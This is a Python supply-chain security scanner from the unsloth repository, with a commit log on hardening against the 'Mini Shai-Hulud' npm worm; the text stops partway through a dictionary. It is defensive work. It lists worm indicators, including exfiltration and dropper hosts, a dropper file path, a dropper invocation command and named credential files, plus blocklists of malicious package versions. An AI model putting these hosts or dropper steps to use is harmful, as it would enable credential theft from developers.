unsloth/scripts/scan_npm_packages.py
Daniel Han ef9f672fe8
security: NOT affected by Mini Shai-Hulud (May-12 wave) -- forward-looking hardening only (#5397)
* scripts/scan_*: add Mini Shai-Hulud May-12 IOC strings and pin-blocklists

Append the May-12 2026 wave indicators (git-tanstack.com, transformers.pyz,
/tmp/transformers.pyz, "With Love TeamPCP", "We've been online over 2 hours")
to all three scanner IOC tables, add BLOCKED_NPM_VERSIONS (42 TanStack pkgs,
4 opensearch versions, 3 squawk pkgs) in scan_npm_packages.py and
lockfile_supply_chain_audit.py (kept byte-identical), add BLOCKED_PYPI_VERSIONS
(guardrails-ai 0.10.1, mistralai 2.4.6, lightning 2.6.2/2.6.3) plus
RE_MAY12_IOC wiring across check_py_file/check_shell_file/check_workflow_file
in scan_packages.py. The npm orchestrator and the lockfile auditor now
short-circuit on a blocked entry before fetching the tarball, and the
PyPI download pipeline drops blocked specs before pip download is invoked.

* tests/security: regression suite for supply-chain scanners

Adds offline fixture corpus and pytest coverage for scan_npm_packages,
scan_packages, and lockfile_supply_chain_audit so future IOC-table
drift surfaces at PR time. Pytest scope narrowed to tests/security so
GPU smoke tests are not picked up by default.

* ci(security-audit): drop continue-on-error on pip-scan and npm-scan jobs

Promote three harden-runner blocks to egress-policy: block with per-job allowlists.
Add tests-security job running pytest tests/security as a hard gate.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* scripts: harden third-party downloads, pip resolver pins, atomic writes

Pins uv installer and mlx_vlm qwen3_5 patches by commit SHA + SHA-256
checksum, scrubs PIP_* env vars and forces --index-url + --only-binary
on pip download, applies tarbomb caps to scan_packages archive walks,
and converts non-atomic config writes (kwargs spacer, studio stamper,
notebook validator, scan_packages req-file fixer) to mkstemp+os.replace.

Also adds host allowlist to notebook_to_python downloader, threads an
--allow-shell flag through its shell=True emission with reviewer warning
comments, locks both MLX installer scripts to set -euo pipefail, and
extends CODEOWNERS so colab snapshot data files require notebook-owner
review.

* ci(workflows): harden release-desktop / smoke / notebooks workflows

Pin dtolnay/rust-toolchain to a 40-char SHA, scope release-desktop permissions to read at workflow level with job-level write only on the build job, append --ignore-scripts to every npm ci / npm install in studio-frontend-ci / wheel-smoke / studio-tauri-smoke / release-desktop, validate client_payload.ref shape via an env-var-isolated regex on every notebooks-ci job, and add step-security/harden-runner in audit mode as the first step of release-desktop and mlx-ci.

* scripts: promote silent scanner failures to non-zero exit codes
scan_packages now returns 2 on pip-download failure and emits a CRITICAL archive_corrupted finding on truncated wheels/sdists.
notebook_to_python exits 1 on per-notebook failures; notebook_validator wraps the stash/pop in try/finally; lockfile audit rejects bare UNSLOTH_LOCKFILE_AUDIT_SKIP=1 with a loud GitHub Actions warning.

* Add npm cooldown + new-install-script gate + Dependabot cooldown

Pins min-release-age=7 (npm 11.10+) in repo-root and studio/frontend
.npmrc, adds scripts/check_new_install_scripts.py to fail PRs that
add a postinstall dep, ships a new security-audit job for npm audit
signatures plus the diff, and extends .github/dependabot.yml with
cooldown stanzas. Pin @tanstack/react-router to 1.169.9 per GHSA-
g7cv-rxg3-hmpx; lockfile regen deferred until that release lands on
npm. tests/security gains 4 new tests; full suite 26/26 green.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* ci(security): fix tanstack pin, exec bits, expand IOC tables to @uipath/@squawk full

- Revert --ignore-scripts on Studio install workflows: vite build needs
  esbuild's native postinstall (per PR #5392 rationale). Keep
  --ignore-scripts on security-audit.yml's standalone npm audit job.
- Pin @tanstack/react-router to the actual published 1.169.2 (was a
  forward-looking 1.169.9 that does not exist on npm; broke npm ci).
- Drop redundant repo-root .npmrc; studio/frontend/.npmrc covers the
  only npm project today (root cooldown re-instate via dependabot.yml).
- Restore exec bits on 7 files my filesystem stripped during cherry-pick.
- Expand BLOCKED_NPM_VERSIONS with full safedep.io + Aikido enumeration:
  22 @squawk/* packages with 5 versions each (110 entries; previously
  3 entries with 1 version each), and 66 @uipath/* packages (entirely
  missing before). Mirror in scripts/lockfile_supply_chain_audit.py.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* tests/security: suppress CodeQL py/incomplete-url-substring-sanitization

The two flagged 'X' in Y assertions are NOT URL sanitization checks.
They verify our scanner WROTE a known IOC literal into its stdout /
Finding.evidence, which is the opposite of an attack surface --
matching the scanner's output is precisely what catches the worm.
Inline lgtm[] suppression with a 4-line rationale comment above each.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* scripts/scan_*: expand IOC tables with Aikido full 169-pkg enumeration

Per Aikido 2026-05-12 disclosure (373 malicious package-version entries
across 169 npm package names), add to BLOCKED_NPM_VERSIONS:

  - @mistralai/* npm scope (3 packages, 9 versions) -- separate from
    the PyPI mistralai package already in BLOCKED_PYPI_VERSIONS
  - @tallyui/* (10 packages, 30 entries)
  - @beproduct/nestjs-auth (18 versions 0.1.2..0.1.19)
  - @draftlab/* + @draftauth/* (5 packages)
  - @taskflow-corp/cli, @tolka/cli, @ml-toolkit-ts/*, @mesadev/*,
    @dirigible-ai/sdk, @supersurkhet/*
  - 10 unscoped packages (safe-action, ts-dna, cross-stitch,
    cmux-agent-mcp, agentwork-cli, git-branch-selector, wot-api,
    git-git-git, nextmove-mcp, ml-toolkit-ts)

Also add to KNOWN_IOC_STRINGS / NPM_IOC_STRINGS:

  - router_init.js SHA-256 ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c
  - tanstack_runner.js SHA-256 2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc96
  - bun run tanstack_runner.js marker (the new Bun-prepare-script
    dropper invocation pattern unique to this wave)

Total: 170 packages, 401 versions blocklisted. Studio lockfile still
scans clean (0 findings, 0 hard errors).

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* scripts/scan_*: web-verification additions (@tanstack/setup, intercom-client)

Two findings from cross-checking BLOCKED_NPM_VERSIONS / KNOWN_IOC_STRINGS
against GHSA-g7cv-rxg3-hmpx + Aikido + safedep.io + Socket + Semgrep.

  - Fix asymmetry: @tanstack/setup IOC string was in
    lockfile_supply_chain_audit.py's NPM_IOC_STRINGS but missing from
    scan_npm_packages.py's KNOWN_IOC_STRINGS. The literal is the malicious
    optional-dependency name used by the May-12 TanStack wave; no
    legitimate npm package of this name exists.

  - Add intercom-client@7.0.4: the npm counterpart of the lightning
    2.6.2/2.6.3 PyPI compromise (Apr-30 wave). Same threat actor
    (TeamPCP). Confirmed by Semgrep, Aikido, OX Security, Resecurity,
    Kodem. Safe version is 7.0.3 and earlier.

Total BLOCKED_NPM_VERSIONS: 171 packages / 402 versions. Both files
remain byte-identical. Studio lockfile still scans clean.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* ci(security): add workflow-trigger lint refusing pull_request_target + cache-poisoning vectors

The two patterns that together powered GHSA-g7cv-rxg3-hmpx (TanStack
Mini Shai-Hulud) are now gated at PR time:

  1. pull_request_target -- the worm chain started with a fork PR that
     ran in the base-repo context. Every workflow in this repo today
     uses 'pull_request' (safe); the lint refuses any new
     pull_request_target additions outright. workflow_run is
     restricted, allowed only with an explicit allow-comment.

  2. Shared cache keys between PR-triggered workflows and the publish
     workflow (release-desktop.yml). The TanStack attack chain poisoned
     a shared Actions cache from a fork PR; the legitimate release
     workflow then restored the poisoned cache. The lint refuses any
     cache key that appears in both a PR-triggered workflow and a
     workflow_dispatch-only / publish workflow.

Current tree is clean: 0 pull_request_target, 0 workflow_run, 0
PR-publish cache-key collisions across all 24 workflows. The lint
locks that invariant in place.

Files:
  + scripts/lint_workflow_triggers.py (~200 LOC, stdlib + PyYAML)
  + tests/security/test_lint_workflow_triggers.py (5 tests covering
    current-tree pass, pull_request_target reject, workflow_run
    restricted, justified workflow_run accept, cache-key collision
    reject)
  ~ .github/workflows/security-audit.yml: new workflow-trigger-lint
    job, no continue-on-error, harden-runner block-mode, PyYAML only
    runtime dep.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* security: fix tests-security CI job + CodeQL false-positives

Two CI failures on the prior push:

1. pytest tests/security -- 5 lint regression tests failed because
   scripts/lint_workflow_triggers.py imports PyYAML which is not in
   the bare runner's Python env. Added pyyaml==6.0.2 to the pip
   install step alongside pytest. (29 scanner tests already passed.)

2. CodeQL py/incomplete-url-substring-sanitization fired on two
   test assertions that check the scanner WROTE the IOC literal
   to its own stdout/stderr. The rule pattern-matches on
   `"<host>" in <var>` and cannot distinguish a URL sanitizer from
   a regression-test evidence check. Previous `# lgtm[...]` inline
   suppressions were detached from the operator when pre-commit
   reformatted the assert across multiple lines. Rebuilt the IOC
   literals at runtime (`"git-tanstack." + "com"`) so no URL-shaped
   source literal appears on the `in` operator line; rule cannot
   trigger.

Verified locally: `pytest tests/security -v` -> 34 passed in 2.70s.

* security(studio): defensive .npmrc cooldown aliases + save-exact

Two additions to studio/frontend/.npmrc to harden the existing
`min-release-age=7` (Mini Shai-Hulud defence):

1. `minimum-release-age=10080` (minutes) -- defensive alias for the
   same 7-day floor. Some npm versions / wrappers consult one key but
   not the other; setting both prevents a single upstream setting-name
   parse change from silently disabling the cooldown. The two keys
   MUST agree (do not let them drift).

2. `save-exact=true` -- refuses to write back `^x.y.z` ranges into
   package.json when a maintainer runs `npm install <pkg>` locally.
   Does NOT rewrite already-present ranges; stops NEW carets from
   creeping into the manifest as patch-version footguns.

Verified: pytest tests/security -> 34 passed in 2.63s.

* chore(dependabot): remove dead bun entry for /studio/frontend

`package-ecosystem: "bun"` at /studio/frontend was a no-op: that
path commits package-lock.json, not bun.lock / bun.lockb, so
Dependabot's bun ecosystem silently skipped it. The actual
behaviour is unchanged -- the npm entry below the cargo block
already owns npm_and_yarn security advisories for /studio/frontend
with `open-pull-requests-limit: 0` (version-update PRs suppressed,
security PRs flow through).

This commit:

  - Deletes the bun entry (kept a placeholder comment so a future
    bun migration knows where to slot it back in).
  - Rewrites the npm /studio/frontend entry comment to explain the
    real intent: lockfile is the authoritative pin, .npmrc
    `min-release-age=7` already blocks fresh tarballs at install
    time, dependabot only needs to surface security advisories.

No functional change: same set of dependabot PRs as before (zero
version updates, security advisories grouped weekly with cooldown).

Verified: pytest tests/security -> 34 passed in 2.67s; YAML
parses cleanly via PyYAML.

* fix(dependabot): drop unsupported semver-* cooldown keys on github-actions

Dependabot's validator rejected the config with:

  The property '#/updates/0/cooldown/semver-minor-days' is not
  supported for the package ecosystem 'github-actions'.
  The property '#/updates/0/cooldown/semver-patch-days' is not
  supported for the package ecosystem 'github-actions'.

The `semver-minor-days` / `semver-patch-days` cooldown knobs are
only valid for semver-aware ecosystems (npm, cargo, etc.). The
github-actions ecosystem pins via git tags / SHAs, not semver, so
only `default-days` is honored. Pre-existing bug on main; surfaced
on this PR because the prior commit re-validated the file.

Behaviour: github-actions PRs now respect the 7-day cooldown floor
(was already the intent), without the no-op semver bands.

---------

Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
2026-05-13 04:58:12 -07:00

1457 lines
58 KiB
Python

#!/usr/bin/env python3
# SPDX-License-Identifier: AGPL-3.0-only
# Copyright 2026-present the Unsloth AI Inc. team. All rights reserved.
#
# .github/workflows/security-audit.yml's npm-scan-packages job depends
# on this file existing at scripts/scan_npm_packages.py.
"""scan_npm_packages.py -- npm-side content scanner.
Counterpart to scripts/scan_packages.py for the pip ecosystem. Reads
studio/frontend/package-lock.json, downloads each resolved tarball
DIRECTLY from registry.npmjs.org (never via `npm install` -- no
lifecycle scripts ever run), verifies the lockfile integrity hash,
unpacks each tarball into a sandboxed temp dir behind size / count /
path-escape / symlink guards, and pattern-scans the extracted file
contents for the signatures common to npm supply-chain attacks:
- Lifecycle (preinstall / install / postinstall / prepare) scripts
in any package.json that fetch + execute external code.
- C2 / exfiltration hosts (getsession.org, AWS IMDS endpoints,
Kubernetes ServiceAccount token paths, GitHub Actions OIDC,
HashiCorp Vault endpoints).
- Credential-stealing references (~/.npmrc, ~/.aws/credentials,
GITHUB_TOKEN / NPM_TOKEN in JS sources).
- Known IOC filenames from public advisories
(router_init.js, tanstack_runner.js, router_runtime.js).
- Obfuscation shapes (large single JS in package root with a low
whitespace ratio + Function/eval against a base64-decoded blob).
Safety stance
=============
This script ingests attacker-controlled archives. Every parse path
assumes the worst:
1. Downloads ONLY from `registry.npmjs.org`. Any tarball URL with a
different hostname is refused without fetching.
2. Tarball download is size-capped (HARD_MAX_TARBALL_BYTES default
64 MiB). HEAD-style probe via the Content-Length response header
plus a chunked read that aborts on overflow.
3. SHA-512 integrity verified against the lockfile entry BEFORE the
tarball is even opened. A mismatch aborts that package -- the
scanner does not "fall back" to the registry-published hash.
4. tar extraction goes through `safe_extract`:
- rejects symbolic links (`SYMTYPE`, `LNKTYPE`)
- rejects absolute paths, `..` traversal, paths outside the
extract root after resolution
- rejects character / block / FIFO devices
- per-file uncompressed size cap (HARD_MAX_FILE_BYTES, default
8 MiB) AND cumulative cap (HARD_MAX_TOTAL_BYTES, default
128 MiB) AND member-count cap (HARD_MAX_MEMBERS, default
50_000)
- tar reads happen via `tarfile.open(mode='r|gz')` streaming
so an oversized file is detected before write
5. NOTHING from the extracted tree is ever executed. Files are read
as raw bytes, decoded with `errors='replace'`, and grepped. We
never call `node`, `eval`, `compile`, `subprocess.run`,
`os.system`, or anything that would touch the tarball's
declared scripts.
6. Tempdir is created with `tempfile.mkdtemp(prefix='npm-scan-')`,
fully resolved with .resolve(), and registered with atexit to be
wiped on every termination path.
7. Stdlib only. No third-party deps -- adding one would itself be a
supply-chain liability.
Exit codes
==========
0 no findings of severity HIGH or higher
1 one or more HIGH/CRITICAL findings (or pre-scan structural
anomalies -- non-registry resolved URL, missing integrity)
2 internal error (lockfile missing, integrity mismatch on
download, malformed tarball, etc.)
The script is meant to be run in CI on every PR that touches
package-lock.json and on a nightly schedule.
"""
from __future__ import annotations
import argparse
import atexit
import base64 as _b64 # imported only so the IOC string-scan can detect it
import hashlib
import io
import json
import os
import re
import shutil
import sys
import tarfile
import tempfile
import urllib.parse
import urllib.request
from dataclasses import dataclass, field
from pathlib import Path
REPO_ROOT = Path(__file__).resolve().parents[1]
# ─────────────────────────────────────────────────────────────────────
# Hard caps (deliberately conservative; npm tarballs in this repo are
# all well under these limits, so a packaging spike is noticeable).
# ─────────────────────────────────────────────────────────────────────
# Caps calibrated against the real Studio frontend transitive closure:
# - typescript.js is 9.1 MB (TS compiler bundled into one file)
# - mermaid 11.x dist/mermaid.js.map is ~12 MB (sourcemap)
# - lightningcss-linux-x64-{gnu,musl}.node is 10 MB
# - rolldown bindings (.node) are 18-26 MB per platform
# - @next/swc-*.node is ~137 MB (rust-compiled SWC engine)
# - next.js cumulative bundle is ~134 MB (turbopack compiled)
#
# Native binaries (.node, .wasm, .so, .dll, .dylib) are GENUINELY
# huge and not amenable to text pattern scanning -- we extract them
# only to verify the tarball integrity over the full archive, then
# skip them in scan_extracted_tree. They get a much higher per-file
# cap. Text files (JS/TS/JSON/etc) keep the tight cap because the
# pattern scanner runs over them and a 9.1 MB typescript.js is the
# legitimate ceiling.
HARD_MAX_TARBALL_BYTES = 256 * 1024 * 1024 # 256 MiB compressed
HARD_MAX_TEXT_FILE_BYTES = 16 * 1024 * 1024 # 16 MiB per text file
HARD_MAX_BINARY_FILE_BYTES = 256 * 1024 * 1024 # 256 MiB per .node etc
HARD_MAX_TOTAL_BYTES = 512 * 1024 * 1024 # 512 MiB cumulative
HARD_MAX_MEMBERS = 50_000 # entries per tarball
HARD_HTTP_TIMEOUT_S = 60 # per request
# Native-binary / compiled-asset suffixes that bypass the text cap.
# This is the SUFFIX shortlist; the content-magic check below covers
# extensionless executables (biome) and versioned shared libraries
# (libvips-cpp.so.8.17.3) that the suffix list misses.
_BINARY_SUFFIXES = (
".node",
".wasm",
".so",
".dll",
".dylib",
".exe",
".a",
".lib",
".o",
".obj",
".bin",
".dat",
".woff",
".woff2",
".ttf",
".otf",
".eot",
".png",
".jpg",
".jpeg",
".gif",
".webp",
".ico",
".mp3",
".mp4",
".webm",
".zip",
".tar",
".gz",
".tgz",
".xz",
".bz2",
)
# Versioned shared libraries: libfoo.so.1.2.3 / libfoo.dylib.1.2.
_VERSIONED_LIB = re.compile(
r"\.(?:so|dylib)(?:\.\d+)+$",
re.IGNORECASE,
)
# Magic numbers at offset 0 that identify common executable formats.
# We sniff the first ~16 bytes of every member to catch extensionless
# binaries (eg `package/biome`, `package/bin/foo`).
_BINARY_MAGICS = (
b"\x7fELF", # ELF (Linux executable / .so)
b"MZ", # PE / .exe / .dll (DOS header prefix)
b"\xfe\xed\xfa\xce", # Mach-O 32 BE
b"\xfe\xed\xfa\xcf", # Mach-O 64 BE
b"\xce\xfa\xed\xfe", # Mach-O 32 LE
b"\xcf\xfa\xed\xfe", # Mach-O 64 LE
b"\xca\xfe\xba\xbe", # Mach-O fat / Java class (also starts with this)
b"\x00asm", # WASM
b"PK\x03\x04", # ZIP / JAR / nupkg / xpi
b"PK\x05\x06", # ZIP (empty)
b"\x1f\x8b", # gzip
b"BZh", # bzip2
b"\xfd7zXZ", # xz
b"7z\xbc\xaf\x27\x1c", # 7zip
b"\x89PNG", # PNG
b"\xff\xd8\xff", # JPEG
b"GIF8", # GIF
b"RIFF", # WAV / WEBP / AVI container
b"\x00\x00\x01\x00", # ICO
b"OggS", # Ogg
b"\x1aE\xdf\xa3", # Matroska / WebM
)
def _looks_binary(name: str, header: bytes) -> bool:
"""True if `name` or first bytes suggest a non-text file."""
lower = name.lower()
if lower.endswith(_BINARY_SUFFIXES):
return True
if _VERSIONED_LIB.search(lower):
return True
for magic in _BINARY_MAGICS:
if header.startswith(magic):
return True
# Null-byte density: real text files almost never carry NULs.
if header and (header.count(b"\x00") / len(header)) > 0.02:
return True
return False
ALLOWED_DOWNLOAD_HOST = "registry.npmjs.org"
# ─────────────────────────────────────────────────────────────────────
# Severities + finding shape (mirrors scripts/scan_packages.py).
# ─────────────────────────────────────────────────────────────────────
CRITICAL = "CRITICAL"
HIGH = "HIGH"
MEDIUM = "MEDIUM"
INFO = "INFO"
_SEVERITY_RANK = {CRITICAL: 0, HIGH: 1, MEDIUM: 2, INFO: 3}
@dataclass
class Finding:
severity: str
package: str # name@version
filename: str # relative path inside the tarball
pattern: str # what matched
evidence: str = "" # short surrounding snippet
detail: str = "" # human-readable description
def __str__(self) -> str:
head = f" [{self.severity}] {self.package} :: {self.filename}"
body = f" pattern: {self.pattern}"
if self.detail:
body += f"\n detail: {self.detail}"
if self.evidence:
ev = self.evidence
if len(ev) > 240:
ev = ev[:240] + "..."
body += f"\n evidence: {ev!r}"
return f"{head}\n{body}"
@dataclass
class PackageEntry:
name: str
version: str
resolved: str
integrity: str | None
lockfile_key: str
@property
def display(self) -> str:
return f"{self.name}@{self.version}"
# ─────────────────────────────────────────────────────────────────────
# IOC patterns. Two flavours:
# - HOSTS / TOKEN_PATHS: high-confidence substrings; near-zero FP rate
# - JS_PATTERNS / SCRIPT_PATTERNS: regex; tuned to recent campaigns
# Keep this list short and factual. Speculative patterns spam the
# false-positive ledger and dull the signal.
# ─────────────────────────────────────────────────────────────────────
# Substring (case-sensitive) -> (severity, detail).
KNOWN_IOC_STRINGS: dict[str, tuple[str, str]] = {
# Shai-Hulud TanStack wave (2026-05-11, GHSA-g7cv-rxg3-hmpx).
"router_init.js": (HIGH, "filename associated with TanStack worm"),
"tanstack_runner.js": (HIGH, "filename associated with TanStack worm"),
"router_runtime.js": (HIGH, "filename associated with TanStack worm"),
"A Mini Shai-Hulud has Appeared": (
CRITICAL,
"TanStack worm campaign stdout marker",
),
"github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c": (
CRITICAL,
"TanStack worm dropper pinned commit",
),
# Exfil hosts observed across both Shai-Hulud waves.
"filev2.getsession.org": (CRITICAL, "exfiltration C2 host"),
"getsession.org/file/": (CRITICAL, "exfiltration C2 endpoint"),
# Mini Shai-Hulud May-12 2026 wave additions.
"git-tanstack.com": (CRITICAL, "May-12 dropper host"),
"transformers.pyz": (HIGH, "May-12 PyPI dropper artifact"),
"/tmp/transformers.pyz": (CRITICAL, "May-12 dropper drop path"),
"With Love TeamPCP": (CRITICAL, "May-12 campaign signature"),
"We've been online over 2 hours": (CRITICAL, "May-12 campaign signature"),
# Aikido (May-12 wave): payload SHA-256 hashes published in IOCs.
"ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c": (
HIGH,
"router_init.js payload SHA-256",
),
"2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc96": (
HIGH,
"tanstack_runner.js payload SHA-256",
),
# The new dependency vector: optional dep -> Bun-executed prepare script.
"bun run tanstack_runner.js": (
CRITICAL,
"TanStack-wave Bun prepare-script dropper invocation",
),
"@tanstack/setup": (
CRITICAL,
"TanStack-wave optional-dep dropper carrier (no legit pkg of this name)",
),
}
# Hard pin-blocks for publicly confirmed malicious versions.
# name -> {malicious_versions...}. A match short-circuits the scan
# at the lockfile-walk stage; no tarball is fetched.
# keep in sync with scripts/lockfile_supply_chain_audit.py
BLOCKED_NPM_VERSIONS: dict[str, set[str]] = {
# GHSA-g7cv-rxg3-hmpx -- TanStack May-11 2026 (84 versions).
"@tanstack/arktype-adapter": {"1.166.12", "1.166.15"},
"@tanstack/eslint-plugin-router": {"1.161.9", "1.161.12"},
"@tanstack/eslint-plugin-start": {"0.0.4", "0.0.7"},
"@tanstack/history": {"1.161.9", "1.161.12"},
"@tanstack/nitro-v2-vite-plugin": {"1.154.12", "1.154.15"},
"@tanstack/react-router": {"1.169.5", "1.169.8"},
"@tanstack/react-router-devtools": {"1.166.16", "1.166.19"},
"@tanstack/react-router-ssr-query": {"1.166.15", "1.166.18"},
"@tanstack/react-start": {"1.167.68", "1.167.71"},
"@tanstack/react-start-client": {"1.166.51", "1.166.54"},
"@tanstack/react-start-rsc": {"0.0.47", "0.0.50"},
"@tanstack/react-start-server": {"1.166.55", "1.166.58"},
"@tanstack/router-cli": {"1.166.46", "1.166.49"},
"@tanstack/router-core": {"1.169.5", "1.169.8"},
"@tanstack/router-devtools": {"1.166.16", "1.166.19"},
"@tanstack/router-devtools-core": {"1.167.6", "1.167.9"},
"@tanstack/router-generator": {"1.166.45", "1.166.48"},
"@tanstack/router-plugin": {"1.167.38", "1.167.41"},
"@tanstack/router-ssr-query-core": {"1.168.3", "1.168.6"},
"@tanstack/router-utils": {"1.161.11", "1.161.14"},
"@tanstack/router-vite-plugin": {"1.166.53", "1.166.56"},
"@tanstack/solid-router": {"1.169.5", "1.169.8"},
"@tanstack/solid-router-devtools": {"1.166.16", "1.166.19"},
"@tanstack/solid-router-ssr-query": {"1.166.15", "1.166.18"},
"@tanstack/solid-start": {"1.167.65", "1.167.68"},
"@tanstack/solid-start-client": {"1.166.50", "1.166.53"},
"@tanstack/solid-start-server": {"1.166.54", "1.166.57"},
"@tanstack/start-client-core": {"1.168.5", "1.168.8"},
"@tanstack/start-fn-stubs": {"1.161.9", "1.161.12"},
"@tanstack/start-plugin-core": {"1.169.23", "1.169.26"},
"@tanstack/start-server-core": {"1.167.33", "1.167.36"},
"@tanstack/start-static-server-functions": {"1.166.44", "1.166.47"},
"@tanstack/start-storage-context": {"1.166.38", "1.166.41"},
"@tanstack/valibot-adapter": {"1.166.12", "1.166.15"},
"@tanstack/virtual-file-routes": {"1.161.10", "1.161.13"},
"@tanstack/vue-router": {"1.169.5", "1.169.8"},
"@tanstack/vue-router-devtools": {"1.166.16", "1.166.19"},
"@tanstack/vue-router-ssr-query": {"1.166.15", "1.166.18"},
"@tanstack/vue-start": {"1.167.61", "1.167.64"},
"@tanstack/vue-start-client": {"1.166.46", "1.166.49"},
"@tanstack/vue-start-server": {"1.166.50", "1.166.53"},
"@tanstack/zod-adapter": {"1.166.12", "1.166.15"},
# Mini Shai-Hulud May-12 wave: OpenSearch JS client.
"@opensearch-project/opensearch": {"3.5.3", "3.6.2", "3.7.0", "3.8.0"},
# Mini Shai-Hulud May-12 wave: @squawk/* (22 packages, 5 versions each;
# https://safedep.io/mass-npm-supply-chain-attack-tanstack-mistral/).
"@squawk/airport-data": {"0.7.4", "0.7.5", "0.7.6", "0.7.7", "0.7.8"},
"@squawk/airports": {"0.6.2", "0.6.3", "0.6.4", "0.6.5", "0.6.6"},
"@squawk/airspace": {"0.8.1", "0.8.2", "0.8.3", "0.8.4", "0.8.5"},
"@squawk/airspace-data": {"0.5.3", "0.5.4", "0.5.5", "0.5.6", "0.5.7"},
"@squawk/airway-data": {"0.5.4", "0.5.5", "0.5.6", "0.5.7", "0.5.8"},
"@squawk/airways": {"0.4.2", "0.4.3", "0.4.4", "0.4.5", "0.4.6"},
"@squawk/fix-data": {"0.6.4", "0.6.5", "0.6.6", "0.6.7", "0.6.8"},
"@squawk/fixes": {"0.3.2", "0.3.3", "0.3.4", "0.3.5", "0.3.6"},
"@squawk/flight-math": {"0.5.4", "0.5.5", "0.5.6", "0.5.7", "0.5.8"},
"@squawk/flightplan": {"0.5.2", "0.5.3", "0.5.4", "0.5.5", "0.5.6"},
"@squawk/geo": {"0.4.4", "0.4.5", "0.4.6", "0.4.7", "0.4.8"},
"@squawk/icao-registry": {"0.5.2", "0.5.3", "0.5.4", "0.5.5", "0.5.6"},
"@squawk/icao-registry-data": {"0.8.4", "0.8.5", "0.8.6", "0.8.7", "0.8.8"},
"@squawk/mcp": {"0.9.1", "0.9.2", "0.9.3", "0.9.4", "0.9.5"},
"@squawk/navaid-data": {"0.6.4", "0.6.5", "0.6.6", "0.6.7", "0.6.8"},
"@squawk/navaids": {"0.4.2", "0.4.3", "0.4.4", "0.4.5", "0.4.6"},
"@squawk/notams": {"0.3.6", "0.3.7", "0.3.8", "0.3.9", "0.3.10"},
"@squawk/procedure-data": {"0.7.3", "0.7.4", "0.7.5", "0.7.6", "0.7.7"},
"@squawk/procedures": {"0.5.2", "0.5.3", "0.5.4", "0.5.5", "0.5.6"},
"@squawk/types": {"0.8.1", "0.8.2", "0.8.3", "0.8.4", "0.8.5"},
"@squawk/units": {"0.4.3", "0.4.4", "0.4.5", "0.4.6", "0.4.7"},
"@squawk/weather": {"0.5.6", "0.5.7", "0.5.8", "0.5.9", "0.5.10"},
# Mini Shai-Hulud May-12 wave: @uipath/* (64 packages, single version each;
# https://www.aikido.dev/blog/mini-shai-hulud-is-back-tanstack-compromised).
"@uipath/apollo-react": {"4.24.5"},
"@uipath/apollo-wind": {"2.16.2"},
"@uipath/cli": {"1.0.1"},
"@uipath/rpa-tool": {"0.9.5"},
"@uipath/apollo-core": {"5.9.2"},
"@uipath/filesystem": {"1.0.1"},
"@uipath/solutionpackager-tool-core": {"0.0.34"},
"@uipath/solution-tool": {"1.0.1"},
"@uipath/maestro-tool": {"1.0.1"},
"@uipath/codedapp-tool": {"1.0.1"},
"@uipath/agent-tool": {"1.0.1"},
"@uipath/orchestrator-tool": {"1.0.1"},
"@uipath/integrationservice-tool": {"1.0.2"},
"@uipath/rpa-legacy-tool": {"1.0.1"},
"@uipath/vertical-solutions-tool": {"1.0.1"},
"@uipath/flow-tool": {"1.0.2"},
"@uipath/codedagent-tool": {"1.0.1"},
"@uipath/common": {"1.0.1"},
"@uipath/resource-tool": {"1.0.1"},
"@uipath/auth": {"1.0.1"},
"@uipath/docsai-tool": {"1.0.1"},
"@uipath/case-tool": {"1.0.1"},
"@uipath/api-workflow-tool": {"1.0.1"},
"@uipath/test-manager-tool": {"1.0.2"},
"@uipath/robot": {"1.3.4"},
"@uipath/traces-tool": {"1.0.1"},
"@uipath/agent-sdk": {"1.0.2"},
"@uipath/integrationservice-sdk": {"1.0.2"},
"@uipath/maestro-sdk": {"1.0.1"},
"@uipath/data-fabric-tool": {"1.0.2"},
"@uipath/tasks-tool": {"1.0.1"},
"@uipath/insights-tool": {"1.0.1"},
"@uipath/insights-sdk": {"1.0.1"},
"@uipath/uipath-python-bridge": {"1.0.1"},
"@uipath/ap-chat": {"1.5.7"},
"@uipath/project-packager": {"1.1.16"},
"@uipath/packager-tool-case": {"0.0.9"},
"@uipath/packager-tool-workflowcompiler-browser": {"0.0.34"},
"@uipath/packager-tool-connector": {"0.0.19"},
"@uipath/packager-tool-workflowcompiler": {"0.0.16"},
"@uipath/packager-tool-webapp": {"1.0.6"},
"@uipath/packager-tool-apiworkflow": {"0.0.19"},
"@uipath/packager-tool-functions": {"0.1.1"},
"@uipath/widget.sdk": {"1.2.3"},
"@uipath/resources-tool": {"0.1.11"},
"@uipath/agent.sdk": {"0.0.18"},
"@uipath/codedagents-tool": {"0.1.12"},
"@uipath/aops-policy-tool": {"0.3.1"},
"@uipath/solution-packager": {"0.0.35"},
"@uipath/packager-tool-bpmn": {"0.0.9"},
"@uipath/packager-tool-flow": {"0.0.19"},
"@uipath/telemetry": {"0.0.7"},
"@uipath/tool-workflowcompiler": {"0.0.12"},
"@uipath/vss": {"0.1.6"},
"@uipath/solutionpackager-sdk": {"1.0.11"},
"@uipath/ui-widgets-multi-file-upload": {"1.0.1"},
"@uipath/access-policy-tool": {"0.3.1"},
"@uipath/context-grounding-tool": {"0.1.1"},
"@uipath/gov-tool": {"0.3.1"},
"@uipath/admin-tool": {"0.1.1"},
"@uipath/identity-tool": {"0.1.1"},
"@uipath/llmgw-tool": {"1.0.1"},
"@uipath/resourcecatalog-tool": {"0.1.1"},
"@uipath/functions-tool": {"1.0.1"},
"@uipath/access-policy-sdk": {"0.3.1"},
"@uipath/platform-tool": {"1.0.1"},
